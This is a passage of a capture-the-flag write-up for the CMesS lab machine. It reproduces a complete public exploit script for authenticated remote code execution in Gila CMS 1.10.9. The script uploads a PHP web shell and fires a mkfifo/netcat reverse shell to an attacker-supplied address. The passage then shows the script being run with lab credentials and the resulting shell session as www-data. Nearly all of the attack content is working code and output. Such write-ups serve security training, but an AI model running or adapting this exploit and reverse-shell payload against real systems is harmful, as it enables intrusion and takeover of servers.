RCE
┌──(kali㉿kali)-[~/archive/thm/cmess]
└─$ searchsploit -m php/webapps/51569.py ; mv 51569.py gila-1_10_9-rce.py
Exploit: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/51569
Path: /usr/share/exploitdb/exploits/php/webapps/51569.py
Codes: N/A
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/archive/thm/cmess/51569.pyThe target Gila CMS instance suffers from a RCE vulnerability
Exploit
# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05-07-2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/
# Version: Gila 1.10.9
# Tested on: Linux
import requests
from termcolor import colored
from urllib.parse import urlparse
# Print ASCII art
ascii_art = """
██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗
╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝
by Unknown_Exploit
"""
print(colored(ascii_art, "green"))
# Prompt user for target URL
target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")
# Extract domain from target URL
parsed_url = urlparse(target_url)
domain = parsed_url.netloc
target_url_2 = f"http://{domain}/"
# Prompt user for login credentials
username = input("Enter the email: ")
password = input("Enter the password: ")
# Create a session and perform login
session = requests.Session()
login_payload = {
'action': 'login',
'username': username,
'password': password
}
response = session.post(target_url, data=login_payload)
cookie = response.cookies.get_dict()
var1 = cookie['PHPSESSID']
var2 = cookie['GSESSIONID']
# Prompt user for local IP and port
lhost = input("Enter the local IP (LHOST): ")
lport = input("Enter the local port (LPORT): ")
# Construct the payload
payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"
payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"
# Perform file upload using POST request
upload_url = f"{target_url_2}fm/upload"
upload_headers = {
"Host": domain,
"Content-Length": "424",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",
"Accept": "*/*",
"Origin": target_url_2,
"Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",
"Connection": "close"
}
upload_data = f'''
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"
Content-Type: application/x-php
<?php system($_GET["cmd"]);?>
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="path"
tmp
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="g_response"
content
------WebKitFormBoundarynKy5BIIJQcZC80i2--
'''
upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)
if upload_response.status_code == 200:
print("File uploaded successfully.")
# Execute payload
response = session.get(payload_url)
print("Payload executed successfully.")
else:
print("Error uploading the file:", upload_response.text)It’s via file upload
Exploitation
┌──(kali㉿kali)-[~/archive/thm/cmess]
└─$ python3 gila-1_10_9-rce.py
██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗
╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝
by Unknown_Exploit
Enter the target login URL (e.g., http://example.com/admin/): http://cmess.thm/admin/
Enter the email: andre@cmess.thm
Enter the password: KPFTN_f2yxe%
Enter the local IP (LHOST): 10.9.1.180
Enter the local port (LPORT): 9999
File uploaded successfully.Executing the exploit script
┌──(kali㉿kali)-[~/archive/thm/cmess]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.1.180] from (UNKNOWN) [10.10.107.72] 44554
bash: cannot set terminal process group (717): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cmess:/var/www/html/tmp$ whoami
whoami
www-data
www-data@cmess:/var/www/html/tmp$ hostname
hostname
cmess
www-data@cmess:/var/www/html/tmp$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:f1:34:3a:89:8b brd ff:ff:ff:ff:ff:ff
inet 10.10.107.72/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::f1:34ff:fe3a:898b/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via RCE